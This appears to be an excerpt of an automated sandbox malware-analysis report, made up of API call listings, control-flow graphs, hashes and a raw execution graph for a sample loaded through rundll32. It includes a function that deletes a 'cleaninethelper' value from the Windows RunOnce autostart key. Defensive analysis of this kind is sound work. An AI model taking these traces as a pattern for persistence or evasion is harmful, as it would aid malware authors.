                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B1235
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,759BA130,?,6E2B176C), ref: 6E2B123E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateHandle$ReadSizeWritefreemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1056976453-0
                                                                                                                                                                                                              • Opcode ID: 7cc33332ca552ac87de779690bfeae399ea0cce8278fe43da3c73a4e9ff5a12b
                                                                                                                                                                                                              • Instruction ID: 8bac0053718fadbb44ffb77b3472341b0a568a9ab1a8439c01d61c597479fe7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cc33332ca552ac87de779690bfeae399ea0cce8278fe43da3c73a4e9ff5a12b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5311A3B21016257FD62016319C8CF7B3E6EEF9B6F9F100A19F516D20D0D6B05806C670
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B136B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 96 6e2b136b-6e2b138e RegOpenKeyExW 97 6e2b13af-6e2b13b3 96->97 98 6e2b1390-6e2b13a9 RegDeleteValueW RegCloseKey 96->98 98->97
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,000F003F,?,00000000,?,?,6E2B17E9), ref: 6E2B1386
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,cleaninethelper,?,?,6E2B17E9), ref: 6E2B1398
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,6E2B17E9), ref: 6E2B13A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • cleaninethelper, xrefs: 6E2B1390
                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 6E2B137C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$cleaninethelper
                                                                                                                                                                                                              • API String ID: 849931509-2845002033
                                                                                                                                                                                                              • Opcode ID: 5e461e220981720a025537d241a22a407062a436933ac891181b06fd5f466a04
                                                                                                                                                                                                              • Instruction ID: 287e4d0d0495d079d205ed6ff19a5cf0ab8cb9d3f164472610b8c5e86ff409dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e461e220981720a025537d241a22a407062a436933ac891181b06fd5f466a04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37E041B2A10719BBDF1557E1CC0DF6E796EDF155997000415B902E7115D571D900D6A0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 6E2B116D Relevance: 4.5, APIs: 3, Instructions: 27COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 99 6e2b116d-6e2b1185 SHGetKnownFolderPath 100 6e2b11a1 99->100 101 6e2b1187-6e2b119f wcscpy CoTaskMemFree 99->101 102 6e2b11a3-6e2b11a5 100->102 101->102
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetKnownFolderPath.SHELL32(6E2B20F0,00000000,00000000,?,?,6E2B20F0,?,6E2B1707), ref: 6E2B117D
                                                                                                                                                                                                              • wcscpy.MSVCRT ref: 6E2B118B
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 6E2B1196
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2143507846.000000006E2B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E2B0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143479302.000000006E2B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143530843.000000006E2B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2143553178.000000006E2B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6e2b0000_rundll32.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderFreeKnownPathTaskwcscpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 993388247-0
                                                                                                                                                                                                              • Opcode ID: 43a2c8fac6c582c620219f2603b6b1f11a451d7bf3864be773f3ad0fa035f4d2
                                                                                                                                                                                                              • Instruction ID: 67010ad055691dc63026c32773ba868dc8088cc2b8f4d95e67edcdf4b6a2af34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43a2c8fac6c582c620219f2603b6b1f11a451d7bf3864be773f3ad0fa035f4d2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE048B2974208FFEB045760DC09F9A7AADDF45259F100454F412D5080E6B1AE40D674
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:13.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:0.9%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:30
                                                                                                                                                                                                              execution_graph 23083 7ff75fbbd7f0 23084 7ff75fbbd831 23083->23084 23085 7ff75fbbd806 23083->23085 23091 7ff75fbbff68 EnterCriticalSection 23085->23091 21602 7ff75fbb3e0c 21627 7ff75fbb3b00 21602->21627 21605 7ff75fbb3f58 21703 7ff75fbb41fc IsProcessorFeaturePresent 21605->21703 21606 7ff75fbb3e28 __scrt_acquire_startup_lock 21608 7ff75fbb3f62 21606->21608 21610 7ff75fbb3e46 21606->21610 21609 7ff75fbb41fc 7 API calls 21608->21609 21612 7ff75fbb3f6d abort 21609->21612 21611 7ff75fbb3e6b 21610->21611 21615 7ff75fbb3e88 __scrt_release_startup_lock 21610->21615 21635 7ff75fbbd6e0 21610->21635 21614 7ff75fbb3ef1 21639 7ff75fbb4348 21614->21639 21615->21614 21692 7ff75fbbc99c 21615->21692 21617 7ff75fbb3ef6 21642 7ff75fbbd670 21617->21642 21710 7ff75fbb4044 21627->21710 21630 7ff75fbb3b2f 21712 7ff75fbbd5a0 21630->21712 21633 7ff75fbb3b2b 21633->21605 21633->21606 21636 7ff75fbbd73b 21635->21636 21637 7ff75fbbd71c 21635->21637 21636->21615 21637->21636 21895 7ff75fb910e0 21637->21895 21923 7ff75fbb4600 21639->21923 21643 7ff75fbc1300 48 API calls 21642->21643 21644 7ff75fbbd67f 21643->21644 21646 7ff75fbb3efe 21644->21646 21925 7ff75fbc1708 21644->21925 21647 7ff75fbb2614 21646->21647 21929 7ff75fba2378 21647->21929 21651 7ff75fbb2648 21979 7ff75fbae930 21651->21979 21653 7ff75fbb2652 memcpy_s 21654 7ff75fbb2669 GetCommandLineW 21653->21654 21655 7ff75fbb2778 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 21654->21655 21656 7ff75fbb267b 21654->21656 21657 7ff75fb945d8 swprintf 46 API calls 21655->21657 22017 7ff75fbb0754 21656->22017 21659 7ff75fbb2802 SetEnvironmentVariableW GetModuleHandleW LoadIconW 21657->21659 21984 7ff75fbaf5c8 LoadBitmapW 21659->21984 21662 7ff75fbb2770 21667 7ff75fbb2124 2 API calls 21662->21667 21663 7ff75fbb2690 OpenFileMappingW 21665 7ff75fbb26b2 MapViewOfFile 21663->21665 21666 7ff75fbb2765 CloseHandle 21663->21666 21669 7ff75fbb26d4 memcpy_s 21665->21669 21670 7ff75fbb275c UnmapViewOfFile 21665->21670 21666->21655 21667->21655 22021 7ff75fbb2124 21669->22021 21670->21666 21671 7ff75fbb285c 22010 7ff75fbac9e0 21671->22010 21675 7ff75fbac9e0 4 API calls 21677 7ff75fbb286f DialogBoxParamW 21675->21677 21678 7ff75fbb28c0 21677->21678 21679 7ff75fbb28d3 Sleep 21678->21679 21680 7ff75fbb28d9 21678->21680 21679->21680 21683 7ff75fbb28e7 21680->21683 22027 7ff75fbaeb4c 21680->22027 21682 7ff75fbb2909 DeleteObject 21684 7ff75fbb2922 DeleteObject 21682->21684 21685 7ff75fbb2928 21682->21685 21683->21682 21684->21685 21686 7ff75fbb295e 21685->21686 21688 7ff75fbb2970 21685->21688 21687 7ff75fbb2190 5 API calls 21686->21687 21690 7ff75fbb2963 CloseHandle 21687->21690 22013 7ff75fbae9a8 21688->22013 21690->21688 21693 7ff75fbbc9da 21692->21693 21694 7ff75fbbc9c8 21692->21694 21695 7ff75fbbc580 35 API calls 21693->21695 21694->21614 21696 7ff75fbbc9df 21695->21696 21704 7ff75fbb4222 memcpy_s abort 21703->21704 21705 7ff75fbb4241 RtlCaptureContext RtlLookupFunctionEntry 21704->21705 21706 7ff75fbb42a6 memcpy_s 21705->21706 21707 7ff75fbb426a RtlVirtualUnwind 21705->21707 21708 7ff75fbb42d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21706->21708 21707->21706 21709 7ff75fbb432a abort 21708->21709 21709->21608 21711 7ff75fbb3b22 __scrt_dllmain_crt_thread_attach 21710->21711 21711->21630 21711->21633 21713 7ff75fbc191c 21712->21713 21714 7ff75fbb3b34 21713->21714 21725 7ff75fbbe700 21713->21725 21732 7ff75fbbf810 21713->21732 21743 7ff75fbc1300 21713->21743 21747 7ff75fbbff20 21713->21747 21714->21633 21719 7ff75fbb5d78 21714->21719 21720 7ff75fbb5d80 21719->21720 21721 7ff75fbb5d8a 21719->21721 21887 7ff75fbb5f04 21720->21887 21721->21633 21724 7ff75fbb7ea4 __vcrt_uninitialize_locks DeleteCriticalSection 21724->21721 21753 7ff75fbc0184 21725->21753 21728 7ff75fbbe71b 21728->21713 21729 7ff75fbbe654 memcpy_s 15 API calls 21730 7ff75fbbe724 21729->21730 21730->21728 21758 7ff75fbbe740 21730->21758 21767 7ff75fbbff68 EnterCriticalSection 21732->21767 21744 7ff75fbc1319 21743->21744 21745 7ff75fbc130d 21743->21745 21744->21713 21768 7ff75fbc1140 21745->21768 21748 7ff75fbbff28 21747->21748 21750 7ff75fbbff59 21748->21750 21751 7ff75fbbff55 21748->21751 21878 7ff75fbc02f4 21748->21878 21883 7ff75fbbff90 21750->21883 21751->21713 21754 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21753->21754 21755 7ff75fbc01b0 21754->21755 21756 7ff75fbc01c8 TlsAlloc 21755->21756 21757 7ff75fbbe710 21755->21757 21756->21757 21757->21728 21757->21729 21759 7ff75fbbe74f 21758->21759 21760 7ff75fbbe754 21758->21760 21762 7ff75fbc01dc 21759->21762 21760->21728 21763 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21762->21763 21764 7ff75fbc0207 21763->21764 21765 7ff75fbc021e TlsFree 21764->21765 21766 7ff75fbc020f 21764->21766 21765->21766 21766->21760 21769 7ff75fbbe5c0 abort 35 API calls 21768->21769 21770 7ff75fbc1159 21769->21770 21771 7ff75fbc1328 swprintf 35 API calls 21770->21771 21772 7ff75fbc1162 21771->21772 21788 7ff75fbc0e4c 21772->21788 21775 7ff75fbc117c 21775->21744 21776 7ff75fbbda58 _snwprintf 16 API calls 21778 7ff75fbc118d 21776->21778 21777 7ff75fbc1228 21779 7ff75fbbda18 __free_lconv_mon 15 API calls 21777->21779 21778->21777 21795 7ff75fbc13e8 21778->21795 21779->21775 21782 7ff75fbc1223 21783 7ff75fbbdedc memcpy_s 15 API calls 21782->21783 21783->21777 21784 7ff75fbc1285 21784->21777 21805 7ff75fbc0bfc 21784->21805 21785 7ff75fbc1248 21785->21784 21786 7ff75fbbda18 __free_lconv_mon 15 API calls 21785->21786 21786->21784 21789 7ff75fbb8818 swprintf 35 API calls 21788->21789 21790 7ff75fbc0e60 21789->21790 21791 7ff75fbc0e7e 21790->21791 21792 7ff75fbc0e6c GetOEMCP 21790->21792 21793 7ff75fbc0e83 GetACP 21791->21793 21794 7ff75fbc0e93 21791->21794 21792->21794 21793->21794 21794->21775 21794->21776 21796 7ff75fbc0e4c 37 API calls 21795->21796 21797 7ff75fbc1415 21796->21797 21798 7ff75fbc141d 21797->21798 21799 7ff75fbc145f IsValidCodePage 21797->21799 21803 7ff75fbc1485 memcpy_s 21797->21803 21800 7ff75fbc6b90 _handle_error 8 API calls 21798->21800 21799->21798 21801 7ff75fbc1470 GetCPInfo 21799->21801 21802 7ff75fbc121c 21800->21802 21801->21798 21801->21803 21802->21782 21802->21785 21812 7ff75fbc0f5c GetCPInfo 21803->21812 21877 7ff75fbbff68 EnterCriticalSection 21805->21877 21813 7ff75fbc1085 21812->21813 21814 7ff75fbc0fa5 21812->21814 21816 7ff75fbc6b90 _handle_error 8 API calls 21813->21816 21822 7ff75fbc2328 21814->21822 21818 7ff75fbc1129 21816->21818 21818->21798 21821 7ff75fbbfe88 _snwprintf 40 API calls 21821->21813 21823 7ff75fbb8818 swprintf 35 API calls 21822->21823 21824 7ff75fbc236a MultiByteToWideChar 21823->21824 21826 7ff75fbc23af 21824->21826 21827 7ff75fbc23a8 21824->21827 21828 7ff75fbc23dd memcpy_s _snwprintf 21826->21828 21829 7ff75fbbda58 _snwprintf 16 API calls 21826->21829 21830 7ff75fbc6b90 _handle_error 8 API calls 21827->21830 21832 7ff75fbc244d MultiByteToWideChar 21828->21832 21834 7ff75fbc2488 21828->21834 21829->21828 21831 7ff75fbc1019 21830->21831 21836 7ff75fbbfe88 21831->21836 21833 7ff75fbc246e GetStringTypeW 21832->21833 21832->21834 21833->21834 21834->21827 21835 7ff75fbbda18 __free_lconv_mon 15 API calls 21834->21835 21835->21827 21837 7ff75fbb8818 swprintf 35 API calls 21836->21837 21838 7ff75fbbfead 21837->21838 21841 7ff75fbbfb2c 21838->21841 21842 7ff75fbbfb6e _snwprintf 21841->21842 21843 7ff75fbbfb92 MultiByteToWideChar 21842->21843 21844 7ff75fbbfbc4 21843->21844 21852 7ff75fbbfe3d 21843->21852 21846 7ff75fbbfbfc _snwprintf 21844->21846 21849 7ff75fbbda58 _snwprintf 16 API calls 21844->21849 21845 7ff75fbc6b90 _handle_error 8 API calls 21847 7ff75fbbfe4b 21845->21847 21848 7ff75fbbfc60 MultiByteToWideChar 21846->21848 21861 7ff75fbbfd11 21846->21861 21847->21821 21850 7ff75fbbfc86 21848->21850 21848->21861 21849->21846 21868 7ff75fbc036c 21850->21868 21852->21845 21854 7ff75fbbda18 __free_lconv_mon 15 API calls 21854->21852 21855 7ff75fbbfd20 21857 7ff75fbbda58 _snwprintf 16 API calls 21855->21857 21859 7ff75fbbfd4b _snwprintf 21855->21859 21856 7ff75fbbfcce 21858 7ff75fbc036c _snwprintf 6 API calls 21856->21858 21856->21861 21857->21859 21858->21861 21860 7ff75fbc036c _snwprintf 6 API calls 21859->21860 21859->21861 21862 7ff75fbbfdde 21860->21862 21861->21852 21861->21854 21863 7ff75fbbfe14 21862->21863 21864 7ff75fbbfe08 WideCharToMultiByte 21862->21864 21863->21861 21865 7ff75fbbda18 __free_lconv_mon 15 API calls 21863->21865 21864->21863 21866 7ff75fbbfe74 21864->21866 21865->21861 21866->21861 21867 7ff75fbbda18 __free_lconv_mon 15 API calls 21866->21867 21867->21861 21869 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21868->21869 21870 7ff75fbc03af 21869->21870 21872 7ff75fbbfcb8 21870->21872 21874 7ff75fbc045c 21870->21874 21872->21855 21872->21856 21872->21861 21873 7ff75fbc0418 LCMapStringW 21873->21872 21875 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21874->21875 21876 7ff75fbc048f _snwprintf 21875->21876 21876->21873 21879 7ff75fbbffe4 __vcrt_uninitialize_ptd 5 API calls 21878->21879 21880 7ff75fbc032f 21879->21880 21881 7ff75fbc034c InitializeCriticalSectionAndSpinCount 21880->21881 21882 7ff75fbc0337 21880->21882 21881->21882 21882->21748 21884 7ff75fbbffbb 21883->21884 21885 7ff75fbbffbf 21884->21885 21886 7ff75fbbff9e DeleteCriticalSection 21884->21886 21885->21751 21886->21884 21888 7ff75fbb5f13 21887->21888 21890 7ff75fbb5d85 21887->21890 21891 7ff75fbb8074 21888->21891 21890->21724 21892 7ff75fbb7edc __vcrt_InitializeCriticalSectionEx 5 API calls 21891->21892 21893 7ff75fbb809b TlsFree 21892->21893 21900 7ff75fb95fb8 21895->21900 21901 7ff75fb9c4d4 2 API calls 21900->21901 21902 7ff75fb95fca 21901->21902 21909 7ff75fb96214 21902->21909 21910 7ff75fb9c5b8 2 API calls 21909->21910 21911 7ff75fb96222 21910->21911 21924 7ff75fbb435f GetStartupInfoW 21923->21924 21924->21617 21926 7ff75fbc1690 21925->21926 21927 7ff75fbb8818 swprintf 35 API calls 21926->21927 21928 7ff75fbc16b4 21927->21928 21928->21644 21930 7ff75fbb3900 _snwprintf 21929->21930 21931 7ff75fba239c GetModuleHandleW 21930->21931 21932 7ff75fba2412 21931->21932 21933 7ff75fba23bd GetProcAddress 21931->21933 21936 7ff75fba27f8 GetModuleFileNameW 21932->21936 22033 7ff75fbbc0b0 21932->22033 21934 7ff75fba23d2 21933->21934 21935 7ff75fba23ea GetProcAddress 21933->21935 21934->21935 21935->21932 21937 7ff75fba23ff 21935->21937 21952 7ff75fba2816 21936->21952 21937->21932 21940 7ff75fba271c GetModuleFileNameW CreateFileW 21941 7ff75fba27ef CloseHandle 21940->21941 21942 7ff75fba2766 SetFilePointer 21940->21942 21941->21936 21942->21941 21943 7ff75fba277b ReadFile 21942->21943 21943->21941 21946 7ff75fba27a1 21943->21946 21944 7ff75fb9c108 GetVersionExW 21944->21952 21945 7ff75fba2320 2 API calls 21945->21952 21947 7ff75fba27e8 21946->21947 21950 7ff75fba2320 2 API calls 21946->21950 21947->21941 21948 7ff75fba288a GetFileAttributesW 21951 7ff75fba28ae 21948->21951 21948->21952 21949 7ff75fba284c CompareStringW 21949->21952 21950->21946 21954 7ff75fba28b8 21951->21954 21955 7ff75fba28f9 21951->21955 21952->21944 21952->21945 21952->21948 21952->21949 21952->21951 21953 7ff75fba2a2f 21978 7ff75fbae27c GetCurrentDirectoryW 21953->21978 21956 7ff75fba28d7 GetFileAttributesW 21954->21956 21957 7ff75fba28f4 21954->21957 21955->21953 21958 7ff75fb9c108 GetVersionExW 21955->21958 21956->21954 21956->21957 21957->21955 21959 7ff75fba2913 21958->21959 21960 7ff75fba2991 21959->21960 21961 7ff75fba291a 21959->21961 21962 7ff75fb945d8 swprintf 46 API calls 21960->21962 21963 7ff75fba2320 2 API calls 21961->21963 21964 7ff75fba29c4 AllocConsole 21962->21964 21965 7ff75fba2926 21963->21965 21967 7ff75fba2a26 ExitProcess 21964->21967 21968 7ff75fba29ce GetCurrentProcessId AttachConsole 21964->21968 21966 7ff75fba2320 2 API calls 21965->21966 21969 7ff75fba2932 21966->21969 22037 7ff75fbb82c8 21968->22037 21971 7ff75fb9fdf8 48 API calls 21969->21971 21973 7ff75fba293c 21971->21973 21974 7ff75fb945d8 swprintf 46 API calls 21973->21974 21975 7ff75fba296b 21974->21975 21976 7ff75fb9fdf8 48 API calls 21975->21976 21977 7ff75fba2975 21976->21977 21977->21967 21978->21651 21980 7ff75fba2320 2 API calls 21979->21980 21981 7ff75fbae945 OleInitialize 21980->21981 21982 7ff75fbae96b 21981->21982 21983 7ff75fbae991 SHGetMalloc 21982->21983 21983->21653 21985 7ff75fbaf5f2 21984->21985 21986 7ff75fbaf5fd 21984->21986 22039 7ff75fbae32c FindResourceW 21985->22039 21988 7ff75fbaf602 GetObjectW 21986->21988 21989 7ff75fbaf617 21986->21989 21988->21989 21991 7ff75fbae1dc 4 API calls 21989->21991 21992 7ff75fbaf62c 21991->21992 21993 7ff75fbaf682 21992->21993 21994 7ff75fbaf652 21992->21994 21995 7ff75fbaf634 21992->21995 22005 7ff75fb9efc8 21993->22005 21996 7ff75fbae244 4 API calls 21994->21996 21997 7ff75fbae32c 10 API calls 21995->21997 21998 7ff75fbaf65b 21996->21998 21999 7ff75fbaf63e 21997->21999 22000 7ff75fbae20c 4 API calls 21998->22000 21999->21994 22001 7ff75fbaf646 DeleteObject 21999->22001 22002 7ff75fbaf666 22000->22002 22001->21994 22003 7ff75fbae4cc 8 API calls 22002->22003 22004 7ff75fbaf673 DeleteObject 22003->22004 22004->21993 22053 7ff75fb9eff8 22005->22053 22007 7ff75fb9efd6 22101 7ff75fb9f9a4 GetModuleHandleW FindResourceW 22007->22101 22009 7ff75fb9efde 22009->21671 22011 7ff75fbb38a0 4 API calls 22010->22011 22012 7ff75fbaca0d 22011->22012 22012->21675 22014 7ff75fbae9c5 22013->22014 22015 7ff75fbae9ce OleUninitialize 22014->22015 22016 7ff75fc012f8 22015->22016 22019 7ff75fbb0769 _snwprintf 22017->22019 22018 7ff75fbb086f 22018->21662 22018->21663 22019->22018 22020 7ff75fba0d18 80 API calls 22019->22020 22020->22019 22022 7ff75fbb3900 _snwprintf 22021->22022 22023 7ff75fbb2130 SetEnvironmentVariableW 22022->22023 22025 7ff75fbb2159 22023->22025 22024 7ff75fbb2186 22024->21670 22025->22024 22026 7ff75fbb2176 SetEnvironmentVariableW 22025->22026 22026->22024 22028 7ff75fbaeb58 _snwprintf 22027->22028 22029 7ff75fba3da0 CompareStringW 22028->22029 22032 7ff75fbaeb99 memcpy_s 22028->22032 22030 7ff75fbaeb89 22029->22030 22030->22032 22141 7ff75fbae91c SetCurrentDirectoryW 22030->22141 22032->21683 22034 7ff75fbbc0c4 swprintf 22033->22034 22035 7ff75fbbb6c8 _snwprintf 39 API calls 22034->22035 22036 7ff75fba2712 22035->22036 22036->21936 22036->21940 22038 7ff75fba29e8 GetStdHandle WriteConsoleW Sleep FreeConsole 22037->22038 22038->21967 22040 7ff75fbae357 SizeofResource 22039->22040 22042 7ff75fbae4a3 22039->22042 22041 7ff75fbae371 LoadResource 22040->22041 22040->22042 22041->22042 22043 7ff75fbae38a LockResource 22041->22043 22042->21986 22043->22042 22044 7ff75fbae39f GlobalAlloc 22043->22044 22044->22042 22045 7ff75fbae3c0 GlobalLock 22044->22045 22046 7ff75fbae49a GlobalFree 22045->22046 22047 7ff75fbae3d2 memcpy_s 22045->22047 22046->22042 22048 7ff75fbae491 GlobalUnlock 22047->22048 22049 7ff75fbae3fe GdipAlloc 22047->22049 22048->22046 22050 7ff75fbae413 22049->22050 22050->22048 22051 7ff75fbae462 GdipCreateHBITMAPFromBitmap 22050->22051 22052 7ff75fbae47a 22050->22052 22051->22052 22052->22048 22054 7ff75fb9f01a _snwprintf 22053->22054 22055 7ff75fb9f037 GetModuleFileNameW 22054->22055 22056 7ff75fb9f072 22054->22056 22057 7ff75fb9f058 22055->22057 22058 7ff75fb9a990 6 API calls 22056->22058 22057->22056 22065 7ff75fb9f0ad 22058->22065 22059 7ff75fb9a5b0 77 API calls 22062 7ff75fb9f911 22059->22062 22060 7ff75fb9f0e7 22103 7ff75fbbad50 22060->22103 22062->22007 22063 7ff75fb9f970 75 API calls 22063->22065 22065->22060 22065->22063 22077 7ff75fb9f333 22065->22077 22066 7ff75fbbad50 31 API calls 22074 7ff75fb9f118 __vcrt_InitializeCriticalSectionEx 22066->22074 22067 7ff75fb9f25b 22068 7ff75fb9ae50 79 API calls 22067->22068 22067->22077 22071 7ff75fb9f276 22068->22071 22069 7ff75fb9af60 77 API calls 22069->22074 22070 7ff75fb9ac90 80 API calls 22070->22074 22073 7ff75fb9ac90 80 API calls 22071->22073 22071->22077 22072 7ff75fb9ae50 79 API calls 22072->22074 22075 7ff75fb9f2a1 22073->22075 22074->22067 22074->22069 22074->22070 22074->22072 22074->22077 22076 7ff75fba3910 MultiByteToWideChar 22075->22076 22075->22077 22098 7ff75fb9f2b1 __vcrt_InitializeCriticalSectionEx 22075->22098 22076->22098 22077->22059 22078 7ff75fbbd8e0 31 API calls 22082 7ff75fb9f7f8 22078->22082 22079 7ff75fb9f714 22080 7ff75fb9f472 22079->22080 22111 7ff75fbbd8e0 22079->22111 22080->22078 22089 7ff75fb9f882 22080->22089 22081 7ff75fbbc0dc 31 API calls 22085 7ff75fb9f85a 22081->22085 22082->22081 22083 7ff75fb9f708 22083->22007 22088 7ff75fb9f92c 75 API calls 22085->22088 22086 7ff75fb9f8c2 22087 7ff75fbbad50 31 API calls 22086->22087 22090 7ff75fb9f8eb 22087->22090 22088->22089 22089->22086 22091 7ff75fb9f970 75 API calls 22089->22091 22092 7ff75fbbad50 31 API calls 22090->22092 22091->22089 22092->22077 22093 7ff75fbbc0dc 31 API calls 22095 7ff75fb9f793 22093->22095 22118 7ff75fb9f92c 22095->22118 22097 7ff75fba3b98 WideCharToMultiByte 22097->22098 22098->22077 22098->22079 22098->22080 22098->22083 22098->22097 22099 7ff75fbbab74 31 API calls 22098->22099 22100 7ff75fb9fda0 _snwprintf 45 API calls 22098->22100 22099->22098 22100->22098 22102 7ff75fb9f9d0 22101->22102 22102->22009 22104 7ff75fbbad7d 22103->22104 22105 7ff75fbbdedc memcpy_s 15 API calls 22104->22105 22110 7ff75fbbad92 22104->22110 22106 7ff75fbbad87 22105->22106 22107 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 22106->22107 22107->22110 22108 7ff75fbc6b90 _handle_error 8 API calls 22109 7ff75fb9f102 22108->22109 22109->22066 22110->22108 22112 7ff75fbbd909 22111->22112 22115 7ff75fb9f72a 22111->22115 22112->22115 22121 7ff75fbbd9b0 22112->22121 22115->22093 22116 7ff75fbbdd68 _invalid_parameter_noinfo 16 API calls 22117 7ff75fbbd954 22116->22117 22130 7ff75fb9e888 22118->22130 22120 7ff75fb9f946 22120->22080 22122 7ff75fbbd9c7 22121->22122 22123 7ff75fbbd9bd 22121->22123 22124 7ff75fbbdedc memcpy_s 15 API calls 22122->22124 22123->22122 22126 7ff75fbbd9e2 22123->22126 22125 7ff75fbbd9ce 22124->22125 22127 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 22125->22127 22128 7ff75fbbd936 22126->22128 22129 7ff75fbbdedc memcpy_s 15 API calls 22126->22129 22127->22128 22128->22115 22128->22116 22129->22125 22131 7ff75fb9e8af 22130->22131 22140 7ff75fb9e923 memcpy_s 22130->22140 22132 7ff75fb9e8dc 22131->22132 22133 7ff75fb97660 73 API calls 22131->22133 22134 7ff75fb9e95d 22132->22134 22135 7ff75fb9e907 22132->22135 22136 7ff75fb9e8d0 22133->22136 22138 7ff75fb97720 73 API calls 22134->22138 22134->22140 22139 7ff75fb97720 73 API calls 22135->22139 22135->22140 22137 7ff75fb97720 73 API calls 22136->22137 22137->22132 22138->22140 22139->22140 22140->22120 22141->22032 18791 7ff75fbb2da1 18792 7ff75fbb2cd4 18791->18792 18792->18791 18794 7ff75fbb3490 18792->18794 18820 7ff75fbb30e4 18794->18820 18797 7ff75fbb351b 18798 7ff75fbb33f4 DloadReleaseSectionWriteAccess 6 API calls 18797->18798 18799 7ff75fbb3528 RaiseException 18798->18799 18815 7ff75fbb3745 18799->18815 18800 7ff75fbb364d 18806 7ff75fbb36ab GetProcAddress 18800->18806 18807 7ff75fbb3715 18800->18807 18801 7ff75fbb35cd LoadLibraryExA 18802 7ff75fbb35e4 GetLastError 18801->18802 18803 7ff75fbb3639 18801->18803 18808 7ff75fbb35f9 18802->18808 18809 7ff75fbb360e 18802->18809 18803->18800 18804 7ff75fbb3644 FreeLibrary 18803->18804 18804->18800 18805 7ff75fbb3544 18805->18800 18805->18801 18805->18803 18805->18807 18806->18807 18810 7ff75fbb36c0 GetLastError 18806->18810 